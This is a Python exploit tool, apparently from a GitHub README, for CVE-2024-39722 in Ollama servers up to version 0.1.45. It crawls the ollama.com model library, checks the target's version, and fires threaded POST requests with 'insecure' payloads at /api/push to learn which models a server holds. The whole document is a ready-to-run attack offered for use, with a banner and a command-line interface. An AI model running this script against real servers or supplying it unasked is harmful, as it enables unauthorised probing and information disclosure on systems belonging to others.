README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import json
import requests
from lxml import etree
import argparse
from termcolor import colored
import threading
import queue
from threading import Lock
from urllib.parse import urlparse
def print_banner():
"""Print exploit banner"""
banner = """
┌─────────────────────────────────────────────────────┐
│ Ollama CVE-2024-39722 Model Existence Disclosure │
│ Exploit for Ollama versions <= 0.1.45 │
│ │
│ CVSS Score: 7.5 │
└─────────────────────────────────────────────────────┘
"""
print(colored(banner, "cyan"))
def get_html_content(url, cache_file="response.html"):
"""
Retrieves HTML content from URL or cache
Args:
url (str): URL to retrieve
cache_file (str): Cache file name
Returns:
tuple: (etree object, status information)
"""
if os.path.exists(cache_file):
print(colored(f"[INFO] File {cache_file} already exists!", "green"))
return etree.parse(cache_file, etree.HTMLParser()), "cached"
else:
try:
res = requests.get(url)
if res.status_code == 200:
print(colored("[INFO] Get html source success!", "green"))
with open(cache_file, "w", encoding="utf-8") as f:
f.write(res.text)
print(colored(f"[INFO] Write html source to file {cache_file} success!", "green"))
return etree.HTML(res.text), "fetched"
else:
print(colored(f"[ERROR] Get html source failed! Status code: {res.status_code}", "red"))
return None, "error"
except Exception as e:
print(colored(f"[ERROR] Exception occurred: {str(e)}", "red"))
return None, "error"
def extract_model_links(html, base_url):
"""
Extracts model links from HTML
Args:
html: etree HTML object
base_url (str): Base URL
Returns:
list: List of model information
"""
links = html.xpath('//*[@id="repo"]/ul/li')
infos = []
for i in range(len(links)):
url = links[i].xpath('./a/@href')[0]
name = url.split("/")[-1]
tags = links[i].xpath('./a/div[2]/div/span[@x-test-size]/text()')
infos.append({
"name": name,
"url": base_url + url,
"tags": tags
})
return infos
def crawl_ollama_models(url="https://ollama.com/library", base_url="https://ollama.com",
cache_file="response.html", output_file="links.json"):
"""
Crawls Ollama model library
Args:
url (str): Model library URL
base_url (str): Base URL
cache_file (str): HTML cache file
output_file (str): Output JSON file
Returns:
list: List of model information
"""
print(colored("[*] Crawling Ollama models...", "yellow"))
html, status = get_html_content(url, cache_file)
if status == "error":
return []
infos = extract_model_links(html, base_url)
for i, info in enumerate(infos):
print(colored(f"[INFO] Get link {i+1}: {info}", "green"))
print(colored(f"[INFO] Get all {len(infos)} links success!", "green"))
# save links to json file
with open(output_file, "w", encoding="utf-8") as f:
json.dump(infos, f, ensure_ascii=False, indent=4)
print(colored(f"[+] Models saved to {output_file}", "green"))
return infos
def format_url(url):
"""
Ensure URL is properly formatted (no trailing slashes)
Args:
url (str): URL to format
Returns:
str: Properly formatted URL
"""
# Ensure URL starts with http/https
if not url.startswith('http'):
url = 'http://' + url
# Remove trailing slash if present
if url.endswith('/'):
url = url[:-1]
return url
def check_ollama_version(base_url):
"""
Check Ollama version to determine if it's vulnerable to CVE-2024-39722
Args:
base_url (str): Base URL of Ollama server
Returns:
tuple: (is_vulnerable, version_str or None, error_message or None)
"""
try:
# Format URL and construct version endpoint URL
base_url = format_url(base_url)
version_url = f"{base_url}/api/version"
# Send request to version endpoint
response = requests.get(version_url, timeout=5)
if response.status_code == 200:
# Parse version from response
data = response.json()
if "version" in data:
version = data["version"]
# Check if version is vulnerable (≤ 0.1.45)
is_vulnerable = is_version_vulnerable(version)
if is_vulnerable:
return True, version, None
else:
return False, version, f"Ollama version {version} is not vulnerable to CVE-2024-39722 (requires version ≤ 0.1.45)"
else:
return False, None, "Version information not found in response"
else:
return False, None, f"Failed to get version, server returned status code: {response.status_code}"
except requests.exceptions.RequestException as e:
return False, None, f"Connection error: {str(e)}"
except Exception as e:
return False, None, f"Error checking Ollama version: {str(e)}"
def is_version_vulnerable(version):
"""
Check if the given version is vulnerable to CVE-2024-39722 (≤ 0.1.45)
Args:
version (str): Version string (e.g., "0.1.44")
Returns:
bool: True if version is vulnerable, False otherwise
"""
try:
# Parse version components
components = version.split('.')
major, minor, patch = map(int, components)
# Check if version is <= 0.1.45
if major == 0 and minor == 1 and patch <= 45:
return True
elif major == 0 and minor < 1:
return True
else:
return False
except (ValueError, IndexError):
# If version parsing fails, assume vulnerable to be safe
print(colored(f"[WARNING] Could not parse version string: {version}", "yellow"))
return True
def send_api_request(url, payload):
"""
Sends API request to Ollama server
Args:
url (str): Target URL
payload (dict): JSON payload
Returns:
str: Response content or None (if error)
"""
# Send POST request
try:
response = requests.post(url, json=payload)
return response.text
except requests.exceptions.RequestException as e:
print(colored(f"[ERROR] Request exception: {e}", "red"))
return None
def worker(task_queue, url, leaked_models, print_lock):
"""
Worker function for threading
Args:
task_queue: Queue with payloads to process
url: Target URL
leaked_models: Shared list to store leaked models
print_lock: Lock for thread-safe printing
"""
while not task_queue.empty():
try:
i, payload = task_queue.get(block=False)
with print_lock:
print(colored(f"[*] Testing payload {i+1}: {payload['name']}", "yellow"))
result = send_api_request(url=url, payload=payload)
if result and "error" not in result:
with print_lock:
print(colored(f"[+] Ollama server model leak: {payload['name']}", "green"))
print(colored(f"[+] Payload: '{json.dumps(payload)}'", "green"))
leaked_models.append(payload['name'])
task_queue.task_done()
except queue.Empty:
break
def exploit_ollama_server(url="http://localhost:11434/api/push", links_file="links.json", thread_count=10):
"""
Exploits Ollama server by attempting to leak models using payloads from a JSON file
Args:
url (str): The URL of the Ollama server API
links_file (str): Path to the JSON file containing links data
thread_count (int): Number of threads to use for payload testing
Returns:
list: List of leaked model names
"""
print(colored("[*] Starting Ollama server exploitation...", "yellow"))
# Format URL properly
url = format_url(url)
# Get base URL for version checking
parsed_url = urlparse(url)
base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
# Check if server is vulnerable based on version
is_vulnerable, version, error = check_ollama_version(base_url)
if not is_vulnerable:
if version:
print(colored(f"[!] Target server is not vulnerable: Ollama v{version}", "yellow"))
if error:
print(colored(f"[!] {error}", "yellow"))
return []
else:
if version:
print(colored(f"[+] Target server is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))
try:
with open(links_file, 'r') as f:
data = json.load(f)
print(colored(f"[INFO] Read {len(data)} links from file {f.name} success!", "green"))
except Exception as e:
print(colored(f"[ERROR] Failed to read links file: {str(e)}", "red"))
return []
payloads = []
leaked_models = []
print_lock = Lock()
# Create payloads from model data
for i in range(len(data)):
for j in range(len(data[i]['tags'])):
payloads.append({
"name": data[i]['name']+":"+data[i]['tags'][j],
"insecure": True,
"stream": True,
})
print(colored(f"[INFO] Generated {len(payloads)} payloads for testing", "green"))
print(colored(f"[INFO] Using {thread_count} threads for payload testing", "green"))
# Create a queue and add payloads with their indices
task_queue = queue.Queue()
for i, payload in enumerate(payloads):
task_queue.put((i, payload))
# Create and start worker threads
threads = []
for _ in range(min(thread_count, len(payloads))):
thread = threading.Thread(
target=worker,
args=(task_queue, url, leaked_models, print_lock)
)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for all threads to complete
for thread in threads:
thread.join()
if leaked_models:
print(colored(f"[+] Successfully leaked {len(leaked_models)} models", "green"))
else:
print(colored("[-] No models leaked", "yellow"))
return leaked_models
def main():
"""Main function"""
parser = argparse.ArgumentParser(description="Ollama CVE-2024-39722 Exploit Tool")
parser.add_argument("-u", "--url",
help="Target Ollama server URL")
parser.add_argument("-c", "--crawl", action="store_true",
help="Crawl Ollama models library")
parser.add_argument("-o", "--output", default="results.json",
help="Output file for results (default: results.json)")
parser.add_argument("-t", "--threads", type=int, default=10,
help="Number of threads to use (default: 10)")
parser.add_argument("-v", "--version-check", action="store_true",
help="Only check if target is vulnerable based on version")
args = parser.parse_args()
print_banner()
# No arguments provided, show help
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
results = {}
# Crawl Ollama models
if args.crawl:
results["crawled_models"] = crawl_ollama_models()
# Check version only
if args.version_check and args.url:
url = format_url(args.url)
is_vulnerable, version, error = check_ollama_version(url)
if is_vulnerable:
print(colored(f"[+] Target is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))
else:
if version:
print(colored(f"[-] Target is not vulnerable: Ollama v{version}", "red"))
if error:
print(colored(f"[!] {error}", "yellow"))
return
# Exploit Ollama server
if args.url:
url = format_url(args.url)
# Make sure URL ends with /api/push for exploitation
if not url.endswith("/api/push"):
url = f"{url}/api/push"
results["leaked_models"] = exploit_ollama_server(url=url, thread_count=args.threads)
# Save results to file
if results:
with open(args.output, "w") as f:
json.dump(results, f, indent=4)
print(colored(f"[+] Results saved to {args.output}", "green"))
if __name__ == "__main__":
main()